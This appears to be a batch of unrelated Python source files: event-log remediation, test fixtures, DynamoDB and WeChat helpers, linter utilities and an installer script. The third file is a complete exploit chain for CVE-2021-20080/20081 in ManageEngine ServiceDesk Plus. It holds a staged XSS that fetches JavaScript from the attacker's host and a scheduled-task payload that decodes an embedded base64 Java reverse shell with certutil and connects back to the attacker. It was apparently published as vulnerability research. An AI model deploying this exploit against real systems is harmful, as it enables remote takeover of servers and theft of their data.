# logging.debug('exitcode is: {0}'.format(exitcode))
#pdb.set_trace()
'''
def record_timestamp(event_source, event_id, event_timestamp, read_or_write):
filename = './.eventindex_{}_{}.index'.format(event_source, event_id)
try:
#pdb.set_trace()
with open(filename, read_or_write) as f:
if read_or_write == 'w':
f.write(str(event_timestamp))
else:
for one_line in f:
return one_line
except FileNotFoundError:
logging.warning('index file not found, ignoring')
return None
except:
logging.error('Unable to write to file {}. Exiting'.format(filename))
raise BaseException
def get_events(log_type, desired_event_id, desired_event_string=None, num_events_to_read=10):
logging.debug('hello from get_events func. Args are: {}, {}, {}, {}'.format(log_type, desired_event_id, desired_event_string, num_events_to_read))
import win32evtlog
import winerror
import win32evtlogutil
log_handle = win32evtlog.OpenEventLog('localhost', log_type)
total = win32evtlog.GetNumberOfEventLogRecords(log_handle)
logging.debug('total # of events: {}'.format(total))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | win32evtlog.EVENTLOG_SEQUENTIAL_READ
i = 1
#pdb.set_trace()
last_timestamp_string = record_timestamp(log_type, desired_event_id, '', 'r')
last_timestamp = datetime.strptime(last_timestamp_string, '%Y-%m-%d %H:%M:%S') if last_timestamp_string else None
while True:
all_events = win32evtlog.ReadEventLog(log_handle, flags, 0)
if not all_events:
win32evtlog.CloseEventLog(log_handle)
return (0, '')
logging.debug('Next batch, size: {}'.format(len(all_events)))
for one_event in all_events:
event_id = str(winerror.HRESULT_CODE(one_event.EventID))
event_id = winerror.HRESULT_CODE(one_event.EventID)
event_source = one_event.SourceName
event_msg = win32evtlogutil.SafeFormatMessage(one_event, log_type)
event_timestamp = one_event.TimeGenerated
logging.debug('|{}| Event:\nID: {}, Timestamp: {}, Source: {}\nMessage: {}'.format(i, event_id, event_timestamp.Format(), event_source, event_msg))
if i == 1:
# remember the 1st event so that we dont have to scan all events next time
record_timestamp(log_type, desired_event_id, event_timestamp, 'w')
if last_timestamp and event_timestamp <= last_timestamp:
logging.debug('already processed this event, will exit at this time.')
win32evtlog.CloseEventLog(log_handle)
return (0, '')
if event_id == desired_event_id:
logging.warning('Event matched, will return 1')
logging.info('Event:\nID: {}, Timestamp: {}, Source: {}\nMessage: {}'.format(event_id, event_timestamp.Format(), event_source, event_msg))
win32evtlog.CloseEventLog(log_handle)
return (1, '')
i = i + 1
if i > int(num_events_to_read):
win32evtlog.CloseEventLog(log_handle)
return (0, '')
def main():
args = parseargs()
logging.info('Script start')
with open(args.configfile) as f:
config_json = json.load(f)
remediation_command_syntax = config_json['remediation_command_syntax']
remediation_command_result = config_json['remediation_command_result']
debug_cmd_list_before = config_json.get('debug_cmd_list_before', [])
debug_cmd_list_after = config_json.get('debug_cmd_list_after', [])
if 'events' in args.mode:
eventlog_type = config_json['eventlog_type']
eventlog_search_string = config_json['eventlog_search_string']
eventlog_id = config_json['eventlog_id']
eventlog_num_of_events_to_check = config_json['eventlog_num_of_events_to_check']
res = get_events(eventlog_type, int(eventlog_id), eventlog_search_string, eventlog_num_of_events_to_check)
else:
check_command_syntax = config_json['check_command_syntax']
#check_command_result = config_json['check_command_result']
#pdb.set_trace()
res = run_cmd(check_command_syntax, return_output=True)
if not res[0]:
logging.info('check command success')
elif res[0] == 1:
logging.warning(f'check failed. Details: {res[1]}')
logging.info('running debug cmds BEFORE remediation')
for debug_cmd in debug_cmd_list_before:
debug_cmd_res = run_cmd(debug_cmd, return_output=True)
logging.info(f'{debug_cmd}: {debug_cmd_res[1]}')
logging.warning('Running remediation command.')
res_remediation_cmd = run_cmd(remediation_command_syntax, return_output=True)
if not res_remediation_cmd[0]:
logging.info('remediation command success judging by return code')
else:
logging.error(f'error running remediation command: {res_remediation_cmd[1]}')
logging.info('running debug cmds AFTER remediation')
for debug_cmd in debug_cmd_list_after:
debug_cmd_res = run_cmd(debug_cmd, return_output=True)
logging.info(f'{debug_cmd}: {debug_cmd_res[1]}')
else:
logging.error(f'Non-1 error while running cmd, check syntax. Script will exit. Error: {res[1]}')
logging.info('Script finish')
if __name__ == "__main__":
main()
|
import os, pytest
from dotenv import load_dotenv
import requests
import json
import base64
@pytest.fixture(scope="session")
def test_env():
load_dotenv()
blobstore = json.loads(os.getenv('blobstore'))
if 'credentials' in blobstore:
credentials = json.loads(os.getenv('blobstore'))['credentials']
mapping = {
"blob_endpoint": 'endpoint',
"blob_accessKey": "accessKey",
"blob_secretKey": "secretKey"}
for k, v in mapping.items():
os.environ[k] = credentials[v]
os.environ['blob_accessKey'] = str(base64.b64encode(bytes(os.environ['blob_accessKey'], 'utf-8')), 'utf-8')
os.environ['blob_secretKey'] = str(base64.b64encode(bytes(os.environ['blob_secretKey'], 'utf-8')), 'utf-8')
@pytest.fixture(scope="session")
def test_param_token():
load_dotenv()
url = os.getenv('sso_endpoint') + '/v4.0/auth'
payload = {
"username": os.getenv("sso_username"),
"password": os.getenv("sso_password")
}
resp = requests.post(url, json=payload ,verify=False)
if resp.status_code == requests.codes.ok:
token = 'Bearer ' + resp.cookies['EIToken']
else:
raise ConnectionError('SSO endpoint failed. status_code: {}, sso_endpoint: {}, username: {}'.format(
resp.status_code,
url,
os.getenv("sso_username")))
yield {
"afs_url": os.getenv("afs_url"),
"instance_id": os.getenv("instance_id"),
"token": token,
}
|
import requests, sys
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import quote
import random
# Author: Chris Lyne (@lynerc)
# Exploits CVE-2021-20080 and CVE-2021-20081 in chain
if len(sys.argv) < 4:
print("Usage: script.py <http(s)://target:port> <attacker ip> <attacker port>")
sys.exit(0)
target = sys.argv[1]
shell_ip = sys.argv[2]
shell_port = sys.argv[3]
stage2_url = "http://" + shell_ip + "/stage2" # XSS will call back here to download more JS
# targeting ManageEngine Servicedesk Plus on Windows
# This XSS is staged due to length restrictions. It loads more JS from the attacker's machine
# spaces not allowed
xss = """');}{function/**/loaded(){eval(this.responseText);}var/**/req=new/**/XMLHttpRequest();req.addEventListener("load",loaded);req.open("GET","${stage2}");req.send(null);//"""
xss = xss.replace("${stage2}", stage2_url)
# This XML contains info for a new workstation asset
xml = """<?xml version="1.0" encoding="UTF-8" ?><DocRoot>
<ComputerName><command>hostname</command><output><![CDATA[
]]></output></ComputerName>
<OS_Category><command>uname -s</command><output><![CDATA[
Darwin
]]></output></OS_Category>
<Hardware_Info>
<OS_Category><command>sw_vers</command><output><![CDATA[
ProductName: macOS
ProductVersion: 11.1
BuildVersion: 20C69
]]></output></OS_Category>
<Computer_Information><command>hostname -s</command><output><![CDATA[
${workstation}
]]></output></Computer_Information>
<CPU_Information><command>system_profiler SPHardwareDataType</command><output><![CDATA[
Hardware:
Hardware Overview:
Model Name: MacBook Pro
Model Identifier: MacBookPro14,3
Processor Name: Quad-Core Intel Core i7
Processor Speed: 2.9 GHz
Number of Processors: 1
Total Number of Cores: 4
L2 Cache (per Core): 256 KB
L3 Cache: 8 MB
Hyper-Threading Technology: Enabled
Memory: 16 GB
System Firmware Version: 429.61.7.0.0
SMC Version (system): 2.46f4
Serial Number (system): A03XJ3PMHTK9
]]></output></CPU_Information>
<NIC_Info><command>/sbin/ifconfig</command><output><![CDATA[
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
options=400<CHANNEL_IO>
ether 7c:83:91:d4:a7:c4
inet6 fe80::102b:587a:9312:a8dc%en0 prefixlen 64 secured scopeid 0x5
inet ${xss} netmask 0xffffff00 broadcast 192.168.0.255
nd6 options=201<PERFORMNUD,DAD>
media: autoselect
status: active
]]></output></NIC_Info>
<PhysicaldrivesInfo><command>/usr/sbin/system_profiler SPParallelATADataType</command><output><![CDATA[
]]></output></PhysicaldrivesInfo>
<HarddrivesInfo><command>/usr/sbin/system_profiler SPSerialATADataType</command><output><![CDATA[
]]></output></HarddrivesInfo>
</Hardware_Info>
<Software_Info>
<Installed_Softwares><command>system_profiler SPApplicationsDataType</command><output><![CDATA[
]]></output></Installed_Softwares>
</Software_Info>
</DocRoot>"""
# fill in xml placeholders
workstation = 'tenable_zero_day'
xml = xml.replace('${workstation}', workstation)
xml = xml.replace('${xss}', xss)
headers = {'Content-Type': 'application/xml'}
print("Sending malicious XML document...")
res = requests.post(target + '/discoveryServlet/WsDiscoveryServlet?computerName=tenable_zero_day_was_here', data=xml, headers=headers)
print(res.text)
print("\nThe administrator must view your asset now. Either wait patiently or send them this link to entice them to view the asset:\n'" + target + "/SearchN.do?searchText=tenable_zero_day&subModSelText=&selectName=assets'");
# ok now wait for a call back from the xss
# this will happen when the admin visits the asset page
data = """var/**/client=new/**/XMLHttpRequest();client.open("GET","/",true);client.send();var/**/now;var/**/start_time;var/**/start_milli;client.onreadystatechange=function(){if(this.readyState==this.HEADERS_RECEIVED){var/**/date=client.getResponseHeader("Date");now=new/**/Date(date);start_time=now;start_milli=start_time.setMinutes(now.getMinutes()+1);t="";c=document.cookie.split(";");for(i=0;i<c.length;i++){var/**/e=c[i].trim();if(e.startsWith("sdpcsrfcookie")){t=e.split("=")[1];}}var/**/xhr=new/**/XMLHttpRequest();xhr.open("POST","/api/v3/custom_schedules",true);xhr.withCredentials=true;xhr.setRequestHeader("X-ZCSRF-TOKEN",t);xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");xhr.send("INPUT_DATA=%7B%22custom_schedules%22%3A%7B%22is_enabled%22%3Atrue%2C%22description%22%3A%22test123%22%2C%22executor_type%22%3A%22script%22%2C%22is_periodic%22%3Atrue%2C%22interval_type%22%3A%22hours%22%2C%22interval_value%22%3A%221%22%2C%22executor%22%3A%22${payload}%22%2C%22name%22%3A%22${name}%22%2C%22start_time%22%3A%7B%22value%22%3A%22"+start_milli+"%22%7D%7D%7D&sdpcsrfparam="+t);}}"""
# random schedule name so we can create new ones
data = data.replace("${name}", 'test'+str(random.random()*10000)[:4])
# this payload will pop you a reverse shell
payload = 'cmd /c '
payload += '\\"cd c:\\\\ && '
# write a base64-encoded Java-based reverse shell to c:\\b64file
# shell courtesy of https://gist.github.com/caseydunham/53eb8503efad39b83633961f12441af0
payload += 'echo,yv66vgAAADQAeQoAAgADBwAEDAAFAAYBABBqYXZhL2xhbmcvT2JqZWN0AQAGPGluaXQ+AQADKClWCgAIAAkHAAoMAAsABgEAD1JldmVyc2VUY3BTaGVsbAEACnByaW50VXNhZ2UKAA0ADgcADwwAEAARAQAQamF2YS9sYW5nL1N5c3RlbQEABGV4aXQBAAQoSSlWCgATABQHABUMABYAFwEAEWphdmEvbGFuZy9JbnRlZ2VyAQAIcGFyc2VJbnQBABUoTGphdmEvbGFuZy9TdHJpbmc7KUkIABkBAAdjbWQuZXhlBwAbAQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyBwAdAQAQamF2YS9sYW5nL1N0cmluZwoAGgAfDAAFACABABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWCgAaACIMACMAJAEAE3JlZGlyZWN0RXJyb3JTdHJlYW0BAB0oWilMamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyOwoAGgAmDAAnACgBAAVzdGFydAEAFSgpTGphdmEvbGFuZy9Qcm9jZXNzOwcAKgEAD2phdmEvbmV0L1NvY2tldAoAKQAsDAAFAC0BABYoTGphdmEvbGFuZy9TdHJpbmc7SSlWCgAvADAHADEMADIAMwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwoALwA1DAA2ADMBAA5nZXRFcnJvclN0cmVhbQoAKQAwCgAvADkMADoAOwEAD2dldE91dHB1dFN0cmVhbQEAGCgpTGphdmEvaW8vT3V0cHV0U3RyZWFtOwoAKQA5CgApAD4MAD8AQAEACGlzQ2xvc2VkAQADKClaCgBCAEMHAEQMAEUARgEAE2phdmEvaW8vSW5wdXRTdHJlYW0BAAlhdmFpbGFibGUBAAMoKUkKAEIASAwASQBGAQAEcmVhZAoASwBMBwBNDABOABEBABRqYXZhL2lvL091dHB1dFN0cmVhbQEABXdyaXRlCgBLAFAMAFEABgEABWZsdXNoBQAAAAAAAAAyCgBVAFYHAFcMAFgAWQEAEGphdmEvbGFuZy9UaHJlYWQBAAVzbGVlcAEABChKKVYKAC8AWwwAXABGAQAJZXhpdFZhbHVlBwBeAQATamF2YS9sYW5nL0V4Y2VwdGlvbgoALwBgDABhAAYBAAdkZXN0cm95CgApAGMMAGQABgEABWNsb3NlCQANAGYMAGcAaAEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwgAagEAJ1VzYWdlOiBSZXZlcnNlVGNwU2hlbGwuamF2YSA8aXA+IDxwb3J0PgoAbABtBwBuDABvAHABABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAARtYWluAQANU3RhY2tNYXBUYWJsZQcAdgEAE1tMamF2YS9sYW5nL1N0cmluZzsBAApTb3VyY2VGaWxlAQAUUmV2ZXJzZVRjcFNoZWxsLmphdmEAIQAIAAIAAAAAAAMAAQAFAAYAAQBxAAAAHQABAAEAAAAFKrcAAbEAAAABAHIAAAAGAAEAAAANAAkAcwAgAAEAcQAAAacABgAMAAAA1iq+BaIACrgABwO4AAwqAzJMKgQyuAASPRIYTrsAGlkEvQAcWQMtU7cAHgS2ACG2ACU6BLsAKVkrHLcAKzoFGQS2AC46BhkEtgA0OgcZBbYANzoIGQS2ADg6CRkFtgA8OgoZBbYAPZoAYBkGtgBBngAQGQoZBrYAR7YASqf/7hkHtgBBngAQGQoZB7YAR7YASqf/7hkItgBBngAQGQkZCLYAR7YASqf/7hkKtgBPGQm2AE8UAFK4AFQZBLYAWlenAAg6C6f/nhkEtgBfGQW2AGKnAAU6BLEAAgC4AL4AwQBdABsA0ADTAF0AAgByAAAAYgAYAAAAEAAGABIACQATAA0AFQARABYAGAAXABsAGQAzABoAPgAbAFMAHABhAB0AaQAeAH4AHwCTACAAqAAhAK0AIgCyACMAuAAlAL4AJgDBACcAxgApAMsAKgDQACsA1QAsAHQAAABHAAoN/wBTAAsHAHUHABwBBwAcBwAvBwApBwBCBwBCBwBCBwBLBwBLAAAHFBQUWAcAXQT/AAwABAcAdQcAHAEHABwAAQcAXQEACQALAAYAAQBxAAAAJQACAAAAAAAJsgBlEmm2AGuxAAAAAQByAAAACgACAAAALgAIAC8AAQB3AAAAAgB4> b64file && '
# base64 decode the file into a Java class file
payload += 'certutil -f -decode b64file ReverseTcpShell.class && '
# and run it using the jvm packaged with the product
payload += 'C:\\\\PROGRA~1\\\\ManageEngine\\\\ServiceDesk\\\\jre\\\\bin\\\\java.exe ReverseTcpShell ${shell_ip} ${shell_port}\\"'
payload = payload.replace("${shell_ip}", shell_ip).replace("${shell_port}", shell_port)
# url encode payload
payload = quote(payload, safe='')
data = data.replace("${payload}", payload)
PORT_NUMBER = 80
class MyHTTPD(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-Type", "text/plain")
self.send_header("Access-Control-Allow-Origin", "*")
self.end_headers()
print("\nReceived a callback from the XSS. Sending stage 2 to create malicious custom scheduled action.")
print("You should probably start your netcat listener now... ")
self.wfile.write(data.encode('UTF-8'))
httpd = HTTPServer(('0.0.0.0', PORT_NUMBER), MyHTTPD)
print('Starting HTTP listener...')
httpd.handle_request() # just one is fine
|
x = BitVec('x', 16)
y = BitVec('y', 16)
print x + 2
# Internal representation
print (x + 2).sexpr()
# -1 is equal to 65535 for 16-bit integers
print simplify(x + y - 1)
# Creating bit-vector constants
a = BitVecVal(-1, 16)
b = BitVecVal(65535, 16)
print simplify(a == b)
a = BitVecVal(-1, 32)
b = BitVecVal(65535, 32)
# -1 is not equal to 65535 for 32-bit integers
print simplify(a == b)
|
# noinspection PyPackageRequirements
from telegram import InlineKeyboardMarkup, InlineKeyboardButton
class InlineKeyboard:
@staticmethod
def release_info(release_id, webarchive_url):
markup= [[
InlineKeyboardButton('Wayback Machine', url=webarchive_url),
InlineKeyboardButton('magnet con trackers', callback_data='expandmagnet:{}'.format(release_id)),
]]
return InlineKeyboardMarkup(markup)
@staticmethod
def collapse_magnet_button(release_id):
return InlineKeyboardMarkup([[
InlineKeyboardButton('comprimi', callback_data='collapse:{}'.format(release_id))
]])
@staticmethod
def release_deeplink(release_deeplink):
return InlineKeyboardMarkup([[
InlineKeyboardButton('vai al torrent', url=release_deeplink)
]])
|
# coding:utf-8
"""
企业微信素材管理模块
"""
__author__ = 'BLUE'
__time__ = 'Tue May 21 2019 10:43:40 GMT+0800'
# ------------------------------------------------------------------------
from WechatBiz.core.WechatBase import WechatBase
from WechatBiz.lib.Utils import is_allowed_extension
def hand_check_file(media_file):
extension = media_file.filename.split('.')[-1].lower()
if not is_allowed_extension(extension):
raise ValueError(u'上传文件类型不允许.')
files = [(media_file.filename, media_file.body)]
return files
class WxBizMedia(WechatBase):
def __init__(self):
self.__tempUrl = 'https://qyapi.weixin.qq.com/cgi-bin/media/upload'
token, expires_at = self.initToken()
super(WxBizMedia, self).__init__(
access_token=token, access_token_expires_at=expires_at)
# 上传临时图片
def UploadTempImage(self, media_file):
"""
上传临时图片
:param media_file: 要上传的文件,一个 File object
详情请参考 https://work.weixin.qq.com/api/doc#90000/90135/90253
:return: 携带JSON数据包的异步Future
"""
files = hand_check_file(media_file)
return self.request.uploadMedia(url=self.__tempUrl, data=dict(type='image', files=files))
# 上传临时语音
def UploadTempVoice(self, media_file):
"""
上传临时语音
:param media_file: 要上传的文件,一个 File object
详情请参考 https://work.weixin.qq.com/api/doc#90000/90135/90253
:return: 携带JSON数据包的异步Future
"""
files = hand_check_file(media_file)
return self.request.uploadMedia(url=self.__tempUrl, data=dict(type='voice', files=files))
# 上传临时视频
def UploadTempVideo(self, media_file):
"""
上传临时视频
:param media_file: 要上传的文件,一个 File object
详情请参考 https://work.weixin.qq.com/api/doc#90000/90135/90253
:return: 携带JSON数据包的异步Future
"""
files = hand_check_file(media_file)
return self.request.uploadMedia(url=self.__tempUrl, data=dict(type='video', files=files))
# 上传临时文件
def UploadTempFile(self, media_file):
"""
上传临时视频
:param media_file: 要上传的文件,一个 File object
详情请参考 https://work.weixin.qq.com/api/doc#90000/90135/90253
:return: 携带JSON数据包的异步Future
"""
files = hand_check_file(media_file)
return self.request.uploadMedia(url=self.__tempUrl, data=dict(type='file', files=files))
# 上传永久图片
def UploadEverImage(self, media_file):
"""
上传永久图片
:param media_file: 要上传的文件,一个 File object
详情请参考 https://work.weixin.qq.com/api/doc#90000/90135/90256
:return: 携带JSON数据包的异步Future
"""
files = hand_check_file(media_file)
return self.request.uploadMedia(
url='https://qyapi.weixin.qq.com/cgi-bin/media/uploadimg',
data=dict(files=files)
)
# 获取临时素材(得到的是整个响应对象,自己解析)
def GetTempMedia(self, media_id):
"""
获取临时素材(得到的是整个响应对象,自己解析)
如果要返回前端,则取相应体res.body,并设置响应类型("Content-Type", "image/jpg")
:param media_id: 媒体文件id
详情请参考 https://work.weixin.qq.com/api/doc#90000/90135/90254
:return: 携带JSON数据包的异步Future
"""
return self.request.getRes(
'https://qyapi.weixin.qq.com/cgi-bin/media/get', data=dict(
media_id=media_id
))
# 获取高清语音素材(得到的是整个响应对象,自己解析)
def GetSuperMedia(self, media_id):
"""
获取高清语音素材(得到的是整个响应对象,自己解析)
:param media_file: 通过JSSDK的uploadVoice接口上传的语音文件id
详情请参考 https://work.weixin.qq.com/api/doc#90000/90135/90255
:return: 携带JSON数据包的异步Future
"""
return self.request.getRes(
'https://qyapi.weixin.qq.com/cgi-bin/media/get/jssdk', data=dict(
media_id=media_id
))
|
import logging
from tornado.options import options
from tornado.httpclient import HTTPError
from tornado_botocore import Botocore
logger = logging.getLogger(__name__)
class DDBBase(object):
TABLE_NAME = ''
# The data type for the attribute. You can specify S for string data,
# N for numeric data, or B for binary data.
ATTRIBUTE_DEFINITIONS = []
# http://docs.aws.amazon.com/amazondynamodb/latest/developerguide/DataModel.html#DataModelPrimaryKey
KEY_SCHEMA = []
# http://docs.aws.amazon.com/amazondynamodb/latest/developerguide/SecondaryIndexes.html
LOCAL_SECONDARY_INDEXES = []
GLOBAL_SECONDARY_INDEXES = []
# http://docs.aws.amazon.com/amazondynamodb/latest/developerguide/ProvisionedThroughputIntro.html
PROVISIONED_THROUGHPUT = {}
ATTRIBUTES = {}
def __init__(self):
pass
def dynamodb(self, operation):
session = getattr(self, '_session', None)
ddb = Botocore(
service='dynamodb', operation=operation,
session=session,
region_name=options.amazon_region,
endpoint_url=options.amazon_ddb_host,
)
'''if options.amazon_access_key and options.amazon_secret_key:
ddb.session.set_credentials(
options.amazon_access_key,
options.amazon_secret_key, token=None)'''
self._session = ddb.session
return ddb
@property
def table_kwargs(self):
kwargs = {
'table_name': self.TABLE_NAME,
'attribute_definitions': self.ATTRIBUTE_DEFINITIONS,
'key_schema': self.KEY_SCHEMA,
'provisioned_throughput': self.PROVISIONED_THROUGHPUT,
}
if getattr(self, 'LOCAL_SECONDARY_INDEXES', None):
kwargs['local_secondary_indexes'] = self.LOCAL_SECONDARY_INDEXES
if getattr(self, 'GLOBAL_SECONDARY_INDEXES', None):
kwargs['global_secondary_indexes'] = self.GLOBAL_SECONDARY_INDEXES
return kwargs
def create_table_if_not_exists(self):
ddb_describe_table = self.dynamodb(operation='DescribeTable')
try:
res = ddb_describe_table.call(table_name=self.TABLE_NAME)
except HTTPError as a:
ddb_describe_table = self.dynamodb(operation='DescribeTable')
try:
res = ddb_describe_table.call(table_name=self.TABLE_NAME)
except HTTPError as b:
print b.response.body
# table does not exist
logger.info('Creating {table_name} table ...'.format(table_name=self.TABLE_NAME))
ddb_create_table = self.dynamodb(operation='CreateTable')
try:
res = ddb_create_table.call(**self.table_kwargs)
except HTTPError as e:
msg = '{table_name} table creation failed: {error}.'.format(
table_name=self.TABLE_NAME,
error=e.response.body)
logger.error(msg)
raise Exception(msg)
def with_types(self, attributes_dict):
result = {}
print attributes_dict
for key, val in attributes_dict.iteritems():
'''print 'VARIABLE TYPE FOR TEST!!!!'
print type(val)
print val
if isinstance(val, list):
print 'THIS IS A LIST YO'
l2 = []
for a in val:
l2.append(unicode(a))
print 'LIST'
result[key] ={self.ATTRIBUTES[key]: l2}
elif val is dict:
result2 = {}
for key2, val2 in val.iteritems():
result2[key2] = unicode(val2)
result[key] = result2
else:
result[key] = {self.ATTRIBUTES[key]: unicode(val)}
print result'''
if self.ATTRIBUTES[key] == 'L':
l2 = []
for a in val:
l2.append(dict(S= str(a)))
val = l2
elif self.ATTRIBUTES[key] == 'M':
d2 = {}
for dkey, dval in val.iteritems():
d2[dkey] = dict(S=dval)
val = d2
result[key] = {self.ATTRIBUTES[key]: val}
return result
|
#!/usr/bin/env python3
import glob
import importlib
import logging
import os
import re
import git
import yaml
from megalinter.Linter import Linter
REPO_HOME_DEFAULT = (
"/tmp/lint"
if os.path.isdir("/tmp/lint")
else os.path.dirname(os.path.abspath(__file__)) + os.path.sep + ".."
)
ANSI_ESCAPE_REGEX = re.compile(r"(\x9B|\x1B\[)[0-?]*[ -\/]*[@-~]")
def list_excluded_directories():
excluded_dirs = [
"__pycache__",
".git",
".pytest_cache",
".rbenv",
".venv",
".terragrunt-cache",
"node_modules",
"report",
]
return excluded_dirs
# Returns directory where all .yml language descriptors are defined
def get_descriptor_dir():
# Compiled version (copied from DockerFile)
if os.path.isdir("/megalinter-descriptors"):
return "/megalinter-descriptors"
# Dev / Test version
else:
descriptor_dir = os.path.realpath(
os.path.dirname(os.path.abspath(__file__)) + "/descriptors"
)
assert os.path.isdir(
descriptor_dir
), f"Descriptor dir {descriptor_dir} not found !"
return descriptor_dir
# List all defined linters
def list_all_linters(linters_init_params=None):
descriptor_files = list_descriptor_files()
linters = []
for descriptor_file in descriptor_files:
descriptor_linters = build_descriptor_linters(
descriptor_file, linters_init_params
)
linters += descriptor_linters
return linters
# List all descriptor files (one by language)
def list_descriptor_files():
descriptors_dir = get_descriptor_dir()
linters_glob_pattern = descriptors_dir + "/*.yml"
descriptor_files = []
for descriptor_file in sorted(glob.glob(linters_glob_pattern)):
descriptor_files += [descriptor_file]
return descriptor_files
# Extract descriptor info from descriptor file
def build_descriptor_info(file):
with open(file, "r", encoding="utf-8") as f:
language_descriptor = yaml.load(f, Loader=yaml.FullLoader)
return language_descriptor
# Build linter instances from a descriptor file name, and initialize them
def build_descriptor_linters(file, linter_init_params=None, linter_names=None):
if linter_names is None:
linter_names = []
linters = []
# Dynamic generation from yaml
with open(file, "r", encoding="utf-8") as f:
language_descriptor = yaml.load(f, Loader=yaml.FullLoader)
# Build common attributes
common_attributes = {}
for attr_key, attr_value in language_descriptor.items():
if attr_key not in ["linters", "install"]:
common_attributes[attr_key] = attr_value
elif attr_key == "install":
common_attributes["descriptor_install"] = attr_value
# Browse linters defined for language
for linter_descriptor in language_descriptor.get("linters"):
if (
len(linter_names) > 0
and linter_descriptor["linter_name"] not in linter_names
):
continue
# Use custom class if defined in file
linter_class = Linter
if linter_descriptor.get("class"):
linter_class_file_name = os.path.splitext(
os.path.basename(linter_descriptor.get("class"))
)[0]
linter_module = importlib.import_module(
".linters." + linter_class_file_name, package=__package__
)
linter_class = getattr(linter_module, linter_class_file_name)
# Create a Linter class instance by linter
instance_attributes = {**common_attributes, **linter_descriptor}
linter_instance = linter_class(linter_init_params, instance_attributes)
linters += [linter_instance]
return linters
# Build a single linter instance from language and linter name
def build_linter(language, linter_name):
language_descriptor_file = (
get_descriptor_dir() + os.path.sep + language.lower() + ".yml"
)
assert os.path.isfile(
language_descriptor_file
), f"Unable to find {language_descriptor_file}"
linters = build_descriptor_linters(language_descriptor_file, None, [linter_name])
assert (
len(linters) == 1
), f"Unable to find linter {linter_name} in {language_descriptor_file}"
return linters[0]
def check_file_extension_or_name(file, file_extensions, file_names):
base_file_name = os.path.basename(file)
filename, file_extension = os.path.splitext(base_file_name)
if len(file_extensions) > 0 and file_extension in file_extensions:
return True
elif len(file_names) > 0 and filename in file_names:
return True
elif len(file_extensions) == 1 and file_extensions[0] == "*":
return True
return False
# Center the string and complete blanks with hyphens (-)
def format_hyphens(str_in):
if str_in != "":
str_in = " " + str_in + " "
return "{s:{c}^{n}}".format(s=str_in, n=100, c="-")
def list_active_reporters_for_scope(scope, reporter_init_params):
reporters = []
# List associated reporters
reporters_dir = os.path.realpath(
os.path.dirname(os.path.abspath(__file__)) + "/reporters"
)
scope_reporters = []
for reporter_class_file in os.listdir(reporters_dir):
if not reporter_class_file.endswith("Reporter.py"):
continue
reporter_class_nm = os.path.splitext(reporter_class_file)[0]
reporter_module = importlib.import_module(
".reporters." + reporter_class_nm, package=__package__
)
reporter_class = getattr(reporter_module, reporter_class_nm)
if reporter_class.scope == scope:
reporter = reporter_class(reporter_init_params)
scope_reporters += [reporter]
# Keep only active reporters
for reporter in scope_reporters:
if reporter.is_active is False:
continue
reporters += [reporter]
# Sort reporters by name
reporters.sort(key=lambda x: x.name)
return reporters
# Can receive a list of strings, regexes, or even mixed :).
# Regexes must start with '(' to be identified are regex
def file_contains(file_name, regex_or_str_list):
with open(file_name, "r", encoding="utf-8") as f:
try:
content = f.read()
except UnicodeDecodeError:
return False
for regex_or_str in regex_or_str_list:
if regex_or_str[0] == "(":
regex = re.compile(regex_or_str)
if regex.search(content, re.MULTILINE) is not None:
return True
else:
if regex_or_str in content:
return True
return False
def decode_utf8(stdout):
# noinspection PyBroadException
try:
res = stdout.decode("utf-8")
except Exception:
res = str(stdout)
return res
def list_updated_files(repo_home):
try:
repo = git.Repo(repo_home)
except git.InvalidGitRepositoryError:
try:
repo = git.Repo(REPO_HOME_DEFAULT)
except git.InvalidGitRepositoryError:
logging.warning("Unable to find git repository to list updated files")
return []
changed_files = [item.a_path for item in repo.index.diff(None)]
return changed_files
def check_updated_file(file, repo_home):
changed_files = list_updated_files(repo_home)
file_absolute = os.path.abspath(file)
for changed_file in changed_files:
if changed_file in file_absolute:
return True
return False
def normalize_log_string(str_in):
return (
ANSI_ESCAPE_REGEX.sub("", str_in) # Remove ANSI escape sequences (ANSI colors)
.replace("/tmp/lint/", "")
.replace("tmp/lint/", "")
.replace("/github/workspace/", "")
.replace("github/workspace/", "")
)
|
#!/usr/bin/env python
import time
import sys
import os
def run_cmd(command):
print "CMD: " + command
print
os.system(command)
print
time.sleep(1)
return
def main():
print
print "===== INSTALLER FOR SE34EUCA ON CENTOS 6 ======"
print
cmd = "sudo yum -y update"
run_cmd(cmd)
cmd = "sudo yum -y install git vim"
run_cmd(cmd)
cmd = "sudo yum -y install Xvfb"
run_cmd(cmd)
cmd = "sudo yum -y install xorg-x11-fonts*"
run_cmd(cmd)
cmd = "sudo yum -y install java-1.7.0-openjdk.x86_64"
run_cmd(cmd)
cmd = "sudo yum -y install firefox"
run_cmd(cmd)
cmd = "sudo yum -y install python-setuptools"
run_cmd(cmd)
cmd = "sudo easy_install pip"
run_cmd(cmd)
cmd = "sudo pip install selenium"
run_cmd(cmd)
cmd = "sudo mkdir -p /root/selenium-server"
run_cmd(cmd)
cmd = "wget http://selenium.googlecode.com/files/selenium-server-standalone-2.32.0.jar"
run_cmd(cmd)
cmd = "sudo mv ./selenium-server-standalone-2.32.0.jar /root/selenium-server/."
run_cmd(cmd)
cmd = "Xvfb :0 -ac 2> /dev/null &"
run_cmd(cmd)
cmd = "sudo nohup java -jar /root/selenium-server/selenium-server-standalone-2.32.0.jar -trustAllSSLCertificates > /tmp/selenium-server.out 2> /tmp/selenium-server.err &"
run_cmd(cmd)
cmd = "dbus-uuidgen | sudo tee -a /var/lib/dbus/machine-id"
run_cmd(cmd)
print
print "===== INSTALLER FOR SE34EUCA : DONE ====="
print
print "TO DO:"
print
